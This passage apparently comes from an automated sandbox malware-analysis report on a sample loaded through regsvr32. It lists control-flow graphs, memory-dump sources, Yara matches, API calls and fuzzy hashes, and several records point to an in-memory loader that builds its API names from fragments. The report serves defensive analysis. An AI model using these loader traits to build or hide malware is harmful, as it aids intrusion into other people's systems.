10121->10124 10122->10124 10123 7ffc66d7e39d MultiByteToWideChar 10125 7ffc66d7e3ff 10123->10125 10126 7ffc66d7e3c7 10123->10126 10124->10113 10124->10123 10125->10113 10129 7ffc66d73024 free 45 API calls 10125->10129 10127 7ffc66d7e3cc WideCharToMultiByte 10126->10127 10128 7ffc66d7e407 10126->10128 10127->10125 10130 7ffc66d7e40d WideCharToMultiByte 10128->10130 10131 7ffc66d7e439 10128->10131 10129->10113 10130->10125 10130->10131 10132 7ffc66d73108 __wtomb_environ 45 API calls 10131->10132 10133 7ffc66d7e446 10132->10133 10133->10125 10134 7ffc66d7e44e WideCharToMultiByte 10133->10134 10134->10125 10135 7ffc66d7e477 10134->10135 10136 7ffc66d73024 free 45 API calls 10135->10136 10136->10125 10138 7ffc66d7287c 10137->10138 10139 7ffc66d725f8 _wcstoui64_l 67 API calls 10138->10139 10140 7ffc66d728a7 10139->10140 10140->10108 10142 7ffc66d789b4 LCMapStringW 10141->10142 10146 7ffc66d789d8 10141->10146 10143 7ffc66d789e4 GetLastError 10142->10143 10142->10146 10143->10146 10144 7ffc66d78ca6 10149 7ffc66d7e1e8 _wcstoui64_l 67 API calls 10144->10149 10145 7ffc66d78a53 10147 7ffc66d78c9f 10145->10147 10148 7ffc66d78a71 MultiByteToWideChar 10145->10148 10146->10144 10146->10145 10150 7ffc66d720e0 __initmbctable 8 API calls 10147->10150 10148->10147 10159 7ffc66d78aa0 10148->10159 10151 7ffc66d78cd4 10149->10151 10152 7ffc66d747d4 10150->10152 10151->10147 10153 7ffc66d78cf3 10151->10153 10154 7ffc66d78e2f LCMapStringA 10151->10154 10152->10060 10156 7ffc66d7e23c _wcstoui64_l 60 API calls 10153->10156 10172 7ffc66d78d3b 10154->10172 10155 7ffc66d78b1c MultiByteToWideChar 10157 7ffc66d78c91 10155->10157 10158 7ffc66d78b46 LCMapStringW 10155->10158 10161 7ffc66d78d0b 10156->10161 10157->10147 10166 7ffc66d73024 free 45 API calls 10157->10166 10158->10157 10162 7ffc66d78b70 10158->10162 10160 7ffc66d76c34 realloc 45 API calls 10159->10160 10163 7ffc66d78ad1 wcsftime 10159->10163 10160->10163 10161->10147 10164 7ffc66d78d13 LCMapStringA 10161->10164 10167 7ffc66d78b7b 10162->10167 10175 7ffc66d78bb6 10162->10175 10163->10147 10163->10155 10164->10172 10177 7ffc66d78d42 10164->10177 10165 7ffc66d78e5f 10165->10147 10173 7ffc66d73024 free 45 API calls 10165->10173 10166->10147 10167->10157 10170 7ffc66d78b92 LCMapStringW 10167->10170 10168 7ffc66d73024 free 45 API calls 10168->10165 10169 7ffc66d78bd4 wcsftime 10169->10157 10174 7ffc66d78c23 LCMapStringW 10169->10174 10170->10157 10171 7ffc66d78d63 __wtomb_environ wcsftime 10171->10172 10180 7ffc66d78dc5 LCMapStringA 10171->10180 10172->10165 10172->10168 10173->10147 10179 7ffc66d78c83 10174->10179 10181 7ffc66d78c44 WideCharToMultiByte 10174->10181 10175->10169 10176 7ffc66d76c34 realloc 45 API calls 10175->10176 10176->10169 10177->10171 10178 7ffc66d76c34 realloc 45 API calls 10177->10178 10178->10171 10179->10157 10183 7ffc66d73024 free 45 API calls 10179->10183 10184 7ffc66d78df1 10180->10184 10185 7ffc66d78ded 10180->10185 10181->10179 10183->10157 10186 7ffc66d7e23c _wcstoui64_l 60 API calls 10184->10186 10185->10172 10187 7ffc66d73024 free 45 API calls 10185->10187 10186->10185 10187->10172 10188->10069 10190 7ffc66d76adf 10189->10190 10191 7ffc66d76af6 10189->10191 10192 7ffc66d77160 _FF_MSGBANNER 44 API calls 10190->10192 10194 7ffc66d7309c __setargv 44 API calls 10191->10194 10204 7ffc66d76b0b 10191->10204 10193 7ffc66d76ae4 10192->10193 10195 7ffc66d76f0c _FF_MSGBANNER 44 API calls 10193->10195 10196 7ffc66d76b19 10194->10196 10197 7ffc66d76aec 10195->10197 10198 7ffc66d76b30 10196->10198 10199 7ffc66d76b21 10196->10199 10201 7ffc66d7334c _lock 3 API calls 10197->10201 10200 7ffc66d76ba0 _lock 44 API calls 10198->10200 10202 7ffc66d767e0 _errno 44 API calls 10199->10202 10203 7ffc66d76b3a 10200->10203 10201->10191 10202->10204 10205 7ffc66d76b72 10203->10205 10206 7ffc66d76b43 10203->10206 10204->9874 10204->9877 10208 7ffc66d73024 free 44 API calls 10205->10208 10207 7ffc66d77ee4 _lock InitializeCriticalSectionAndSpinCount 10206->10207 10209 7ffc66d76b50 10207->10209 10210 7ffc66d76b61 LeaveCriticalSection 10208->10210 10209->10210 10212 7ffc66d73024 free 44 API calls 10209->10212 10210->10204 10213 7ffc66d76b5c 10212->10213 10214 7ffc66d767e0 _errno 44 API calls 10213->10214 10214->10210 10216 7ffc66d7740a EncodePointer 10215->10216 10216->10216 10217 7ffc66d7741f 10216->10217 10217->9617 10221 7ffc66d772d4 10218->10221 10234 7ffc66d73364 10221->10234 10236 7ffc66d76d01 10235->10236 10238 7ffc66d76d33 realloc 10235->10238 10237 7ffc66d76d0f 10236->10237 10236->10238 10240 7ffc66d767e0 _errno 44 API calls 10237->10240 10239 7ffc66d76d4b RtlAllocateHeap 10238->10239 10241 7ffc66d76d2f 10238->10241 10239->10238 10239->10241 10242 7ffc66d76d14 10240->10242 10241->9622 10243 7ffc66d766d8 _invalid_parameter_noinfo 7 API calls 10242->10243 10243->10241 10246 7ffc66d72e21 10245->10246 10274 7ffc66d72f42 10245->10274 10247 7ffc66d72e3c 10246->10247 10248 7ffc66d73024 free 45 API calls 10246->10248 10249 7ffc66d72e4a 10247->10249 10250 7ffc66d73024 free 45 API calls 10247->10250 10248->10247 10251 7ffc66d72e58 10249->10251 10252 7ffc66d73024 free 45 API calls 10249->10252 10250->10249 10253 7ffc66d73024 free 45 API calls 10251->10253 10254 7ffc66d72e66 10251->10254 10252->10251 10253->10254 10255 7ffc66d72e74 10254->10255 10256 7ffc66d73024 free 45 API calls 10254->10256 10257 7ffc66d72e82 10255->10257 10259 7ffc66d73024 free 45 API calls 10255->10259 10256->10255 10258 7ffc66d72e93 10257->10258 10260 7ffc66d73024 free 45 API calls 10257->10260 10261 7ffc66d72eab 10258->10261 10262 7ffc66d73024 free 45 API calls 10258->10262 10259->10257 10260->10258 10263 7ffc66d76ba0 _lock 45 API calls 10261->10263 10262->10261 10267 7ffc66d72eb5 10263->10267 10264 7ffc66d72ee3 10277 7ffc66d76a80 LeaveCriticalSection 10264->10277 10267->10264 10269 7ffc66d73024 free 45 API calls 10267->10269 10269->10264 10274->9648 10278 7ffc66d71ee7 10279 7ffc66d71f13 RtlAllocateHeap 10278->10279 10280 7ffc66d71f5c 10279->10280 10281 7ffc66d71f3d RtlDeleteBoundaryDescriptor 10279->10281 10281->10280

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 8 620000-620460 call 620aa8 * 2 VirtualAlloc 30 620462-620466 8->30 31 62048a-620494 8->31 32 620468-620488 30->32 34 620a91-620aa6 31->34 35 62049a-62049e 31->35 32->31 32->32 35->34 36 6204a4-6204a8 35->36 36->34 37 6204ae-6204b2 36->37 37->34 38 6204b8-6204bf 37->38 38->34 39 6204c5-6204d2 38->39 39->34 40 6204d8-6204e1 39->40 40->34 41 6204e7-6204f4 40->41 41->34 42 6204fa-620507 41->42 43 620531-620567 GetNativeSystemInfo 42->43 44 620509-620511 42->44 43->34 45 62056d-620589 VirtualAlloc 43->45 46 620513-620518 44->46 47 6205a0-6205ac 45->47 48 62058b-62059e 45->48 49 620521 46->49 50 62051a-62051f 46->50 51 6205af-6205b2 47->51 48->47 52 620523-62052f 49->52 50->52 54 6205c1-6205db 51->54 55 6205b4-6205bf 51->55 52->43 52->46 56 62061b-620622 54->56 57 6205dd-6205e2 54->57 55->51 59 6206db-6206e2 56->59 60 620628-62062f 56->60 58 6205e4-6205ea 57->58 63 62060b-620619 58->63 64 6205ec-620609 58->64 61 620864-62086b 59->61 62 6206e8-6206f9 59->62 60->59 65 620635-620642 60->65 68 620871-62087f 61->68 69 620917-620929 61->69 67 620702-620705 62->67 63->56 63->58 64->63 64->64 65->59 66 620648-62064f 65->66 70 620654-620658 66->70 71 620707-62070a 67->71 72 6206fb-6206ff 67->72 75 62090e-620911 68->75 73 620a07-620a1a 69->73 74 62092f-620937 69->74 76 6206c0-6206ca 70->76 77 620788-62078e 71->77 78 62070c-62071d 71->78 72->67 95 620a40-620a4a 73->95 96 620a1c-620a27 73->96 80 62093b-62093f 74->80 75->69 79 620884-6208a9 75->79 86 62065a-620669 76->86 87 6206cc-6206d2 76->87 83 620794-6207a2 77->83 78->83 84 62071f-620720 78->84 100 620907-62090c 79->100 101 6208ab-6208b1 79->101 81 620945-62095a 80->81 82 6209ec-6209fa 80->82 89 62097b-62097d 81->89 90 62095c-62095e 81->90 82->80 91 620a00-620a01 82->91 97 6207a8 83->97 98 62085d-62085e 83->98 94 620722-620784 84->94 92 62067a-62067e 86->92 93 62066b-620678 86->93 87->70 99 6206d4-6206d5 87->99 105 6209a2-6209a4 89->105 106 62097f-620981 89->106 102 620960-62096c 90->102 103 62096e-620979 90->103 91->73 107 620680-62068a 92->107 108 62068c-620690 92->108 104 6206bd-6206be 93->104 94->94 109 620786 94->109 112 620a7b-620a8e 95->112 113 620a4c-620a54 95->113 110 620a38-620a3e 96->110 111 6207ae-6207d4 97->111 98->61 99->59 100->75 122 6208b3-6208b9 101->122 123 6208bb-6208c8 101->123 114 6209be-6209bf 102->114 103->114 104->76 120 6209a6-6209aa 105->120 121 6209ac-6209bb 105->121 115 620983-620987 106->115 116 620989-62098b 106->116 117 6206b6-6206ba 107->117 118 620692-6206a3 108->118 119 6206a5-6206a9 108->119 109->83 110->95 124 620a29-620a35 110->124 139 6207d6-6207d9 111->139 140 620835-620839 111->140 112->34 113->112 125 620a56-620a79 RtlAddFunctionTable 113->125 129 6209c5-6209cb 114->129 115->114 116->105 127 62098d-62098f 116->127 117->104 118->117 119->104 128 6206ab-6206b3 119->128 120->114 121->114 130 6208ea-6208fe 122->130 131 6208d3-6208e5 123->131 132 6208ca-6208d1 123->132 124->110 125->112 134 620991-620997 127->134 135 620999-6209a0 127->135 128->117 136 6209d9-6209e9 VirtualProtect 129->136 137 6209cd-6209d3 129->137 130->100 150 620900-620905 130->150 131->130 132->131 132->132 134->114 135->129 136->82 137->136 144 6207e3-6207f0 139->144 145 6207db-6207e1 139->145 141 620844-620850 140->141 142 62083b 140->142 141->111 149 620856-620857 141->149 142->141 147 6207f2-6207f9 144->147 148 6207fb-62080d 144->148 146 620812-62082c 145->146 146->140 152 62082e-620833 146->152 147->147 147->148 148->146 149->98 150->101 152->139
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277259609.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_620000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                            • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                            • API String ID: 394283112-2517549848
                                                                                                                            • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                            • Instruction ID: 40bcfdce178a4c670b53383d90c7cffdd7b2a79a8d5d6260e32c525ff9678509
                                                                                                                            • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                            • Instruction Fuzzy Hash: 6272B330618B488BDB19DF18D8856FAB7E1FB98305F10562DE88BD7212DB34D986CF85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                            • API String ID: 0-464535774
                                                                                                                            • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                            • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                            • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                            • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 303 180010ff4-180011016 304 180011020 303->304 305 180011022-180011028 304->305 306 180011814 305->306 307 18001102e-180011034 305->307 308 180011819-18001181f 306->308 309 1800114e2-1800114ec 307->309 310 18001103a-180011040 307->310 308->305 311 180011825-180011832 308->311 314 1800114f5-18001151d 309->314 315 1800114ee-1800114f3 309->315 312 1800113e2-1800114d2 call 180008200 310->312 313 180011046-18001104c 310->313 312->311 323 1800114d8-1800114dd 312->323 313->308 317 180011052-18001120b call 180021040 call 1800291ac 313->317 318 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 314->318 315->318 329 180011212-1800113d7 call 1800291ac call 18001e2bc 317->329 330 18001120d 317->330 333 1800117f9-180011803 318->333 323->305 329->311 338 1800113dd 329->338 330->329 333->311 335 180011805-18001180f 333->335 335->305 338->304
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                            • API String ID: 0-3528011396
                                                                                                                            • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                            • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                            • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                            • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 339 180021618-180021653 340 180021655-18002165a 339->340 341 180021bf3-180021c25 340->341 342 180021660-180021665 340->342 343 180021c2a-180021c2f 341->343 344 180021a81-180021bda call 180016314 342->344 345 18002166b-180021670 342->345 347 180021838-180021845 343->347 348 180021c35 343->348 352 180021bdf-180021bee 344->352 349 1800219f3-180021a7c call 180001b1c 345->349 350 180021676-18002167b 345->350 348->340 349->340 353 1800219e4-1800219ee 350->353 354 180021681-180021686 350->354 352->340 353->340 356 1800219d5-1800219df call 18001dfb4 354->356 357 18002168c-180021691 354->357 356->340 358 180021697-18002169c 357->358 359 18002190c-1800219a5 call 18000abac 357->359 362 1800216a2-1800216a7 358->362 363 180021846-180021907 call 180021434 358->363 366 1800219aa-1800219b0 359->366 362->343 367 1800216ad-180021835 call 180008200 call 1800166c0 362->367 363->340 369 1800219b2-1800219c6 366->369 370 1800219cb-1800219d0 366->370 367->347 369->340 370->340
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                            • API String ID: 0-3036092626
                                                                                                                            • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                            • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                            • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                            • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 404 18000c608-18000c62d 405 18000c632-18000c637 404->405 406 18000cc8a-18000cc8f 405->406 407 18000c63d 405->407 408 18000cc95-18000cc9a 406->408 409 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 406->409 410 18000c643-18000c648 407->410 411 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 407->411 414 18000ce33-18000ced7 call 180008ad8 call 18001c32c 408->414 415 18000cca0-18000cca5 408->415 436 18000cfb4-18000d00a call 1800194a4 409->436 416 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 410->416 417 18000c64e-18000c653 410->417 438 18000cc28-18000cc85 call 1800194a4 411->438 456 18000cedc-18000cf26 call 1800194a4 414->456 421 18000cd35-18000cdce call 18000703c call 18001c32c 415->421 422 18000ccab-18000ccb0 415->422 416->405 424 18000c9c1-18000caa0 call 18002870c call 18001c32c call 1800194a4 417->424 425 18000c659-18000c65e 417->425 461 18000cdd3-18000ce2e call 1800194a4 421->461 431 18000ccb6-18000cd30 call 180021434 422->431 432 18000d00f-18000d014 422->432 424->405 434 18000c664-18000c669 425->434 435 18000c8bb-18000c963 call 180002610 call 18001c32c 425->435 431->405 432->405 440 18000d01a-18000d020 432->440 444 18000c7b2-18000c85a call 180019618 call 18001c32c 434->444 445 18000c66f-18000c674 434->445 468 18000c968-18000c9bc call 1800194a4 435->468 436->432 438->405 477 18000c85f-18000c8b6 call 1800194a4 444->477 445->432 449 18000c67a-18000c73d call 180002178 call 18001c32c 445->449 478 18000c742-18000c7ad call 1800194a4 449->478 456->405 461->405 468->405 477->405 478->405
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: +#;)$K'$sf$w\H
                                                                                                                            • API String ID: 0-1051058546
                                                                                                                            • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                            • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                            • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                            • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: <4P$<8$<w.
                                                                                                                            • API String ID: 0-1030867500
                                                                                                                            • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                            • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                            • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                            • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                            • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                            • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                            • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 153 7ffc66d72154-7ffc66d72160 154 7ffc66d72162-7ffc66d7216b call 7ffc66d74110 153->154 155 7ffc66d721e1-7ffc66d721e3 153->155 163 7ffc66d7216d-7ffc66d7216f 154->163 167 7ffc66d72174-7ffc66d7217b call 7ffc66d72fa0 154->167 157 7ffc66d7221e-7ffc66d72221 155->157 158 7ffc66d721e5-7ffc66d721ed 155->158 159 7ffc66d72223-7ffc66d72232 call 7ffc66d72c88 call 7ffc66d73108 157->159 160 7ffc66d72279-7ffc66d7227c 157->160 162 7ffc66d721f3-7ffc66d72201 158->162 158->163 179 7ffc66d72237-7ffc66d7223d 159->179 164 7ffc66d7227e-7ffc66d72280 call 7ffc66d72f50 160->164 165 7ffc66d72285 160->165 168 7ffc66d72203 call 7ffc66d736d0 162->168 169 7ffc66d72208-7ffc66d7220b 162->169 170 7ffc66d7228a-7ffc66d7228f 163->170 164->165 165->170 180 7ffc66d7217d-7ffc66d72182 call 7ffc66d7415c 167->180 181 7ffc66d72184-7ffc66d721a9 call 7ffc66d740a0 GetCommandLineA call 7ffc66d73eec call 7ffc66d73758 167->181 168->169 169->165 175 7ffc66d7220d-7ffc66d7221c call 7ffc66d73a48 call 7ffc66d72c94 call 7ffc66d7415c 169->175 175->165 179->163 184 7ffc66d72243-7ffc66d72257 FlsSetValue 179->184 180->163 202 7ffc66d721b2-7ffc66d721b9 call 7ffc66d73df4 181->202 203 7ffc66d721ab-7ffc66d721b0 call 7ffc66d72c94 181->203 189 7ffc66d7226f-7ffc66d72274 call 7ffc66d73024 184->189 190 7ffc66d72259-7ffc66d7226d call 7ffc66d72cbc GetCurrentThreadId 184->190 189->163 190->165 208 7ffc66d721da-7ffc66d721df call 7ffc66d73a48 202->208 209 7ffc66d721bb-7ffc66d721c2 call 7ffc66d73aec 202->209 203->180 208->203 209->208 214 7ffc66d721c4-7ffc66d721c6 call 7ffc66d7347c 209->214 216 7ffc66d721cb-7ffc66d721cd 214->216 216->208 217 7ffc66d721cf-7ffc66d721d5 216->217 217->165
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00007FFC66D74110: HeapCreate.KERNELBASE(?,?,?,?,00007FFC66D72169), ref: 00007FFC66D74122
                                                                                                                              • Part of subcall function 00007FFC66D74110: HeapSetInformation.KERNEL32 ref: 00007FFC66D7414C
                                                                                                                            • _RTC_Initialize.LIBCMT ref: 00007FFC66D72184
                                                                                                                            • GetCommandLineA.KERNEL32 ref: 00007FFC66D72189
                                                                                                                              • Part of subcall function 00007FFC66D73EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC66D7219B), ref: 00007FFC66D73F1B
                                                                                                                              • Part of subcall function 00007FFC66D73EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFC66D7219B), ref: 00007FFC66D73F5B
                                                                                                                              • Part of subcall function 00007FFC66D73758: GetStartupInfoA.KERNEL32 ref: 00007FFC66D7377D
                                                                                                                            • __setargv.LIBCMT ref: 00007FFC66D721B2
                                                                                                                            • _cinit.LIBCMT ref: 00007FFC66D721C6
                                                                                                                              • Part of subcall function 00007FFC66D72C94: FlsFree.KERNEL32(?,?,?,?,00007FFC66D72217), ref: 00007FFC66D72CA3
                                                                                                                              • Part of subcall function 00007FFC66D72C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC66D72217), ref: 00007FFC66D76A32
                                                                                                                              • Part of subcall function 00007FFC66D72C94: free.LIBCMT ref: 00007FFC66D76A3B
                                                                                                                              • Part of subcall function 00007FFC66D72C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC66D72217), ref: 00007FFC66D76A5B
                                                                                                                              • Part of subcall function 00007FFC66D73108: Sleep.KERNEL32(?,?,0000000A,00007FFC66D72DA3,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7314D
                                                                                                                            • FlsSetValue.KERNEL32 ref: 00007FFC66D7224C
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00007FFC66D72260
                                                                                                                            • free.LIBCMT ref: 00007FFC66D7226F
                                                                                                                              • Part of subcall function 00007FFC66D73024: HeapFree.KERNEL32(?,?,00000000,00007FFC66D72DDC,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7303A
                                                                                                                              • Part of subcall function 00007FFC66D73024: _errno.LIBCMT ref: 00007FFC66D73044
                                                                                                                              • Part of subcall function 00007FFC66D73024: GetLastError.KERNEL32(?,?,00000000,00007FFC66D72DDC,?,?,?,00007FFC66D72DFF,?,?,?,00007FFC66D7254F,?,?,?,00007FFC66D7262A), ref: 00007FFC66D7304C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.277864486.00007FFC66D31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC66D30000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.277856075.00007FFC66D30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277990668.00007FFC66D82000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.277996591.00007FFC66D86000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.278023191.00007FFC66D89000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_7ffc66d30000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1549890855-0
                                                                                                                            • Opcode ID: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                            • Instruction ID: c14e8d5bc9d192e5469158a7fdce138b99dbbf6036cb5b8dd4ddbc411fe77714
                                                                                                                            • Opcode Fuzzy Hash: 1bfc46722c3ac8e7b1a3fe84d8ded69fde3dc3f1e7eef4d63a5cdedb7541036a
                                                                                                                            • Instruction Fuzzy Hash: 8631EF20E0C2BBC1FA6C67A2580627E99946F65358F114138D9DD4D2C2EE2EF840FE33
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • _getptd.LIBCMT ref: 00007FFC66D74CF3
                                                                                                                              • Part of subcall function 00007FFC66D7497C: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00007FFC66D74D0E,?,?,?,?,?,00007FFC66D74EE3), ref: 00007FFC66D749A6
                                                                                                                              • Part of subcall function 00007FFC66D7309C: Sleep.KERNEL32(?,?,00000000,00007FFC66D76B19,?,?,00000000,00007FFC66D76BC3,?,?,?,?,?,?,00000000,00007FFC66D72DC8), ref: 00007FFC66D730D2
                                                                                                                            • free.LIBCMT ref: 00007FFC66D74D7F
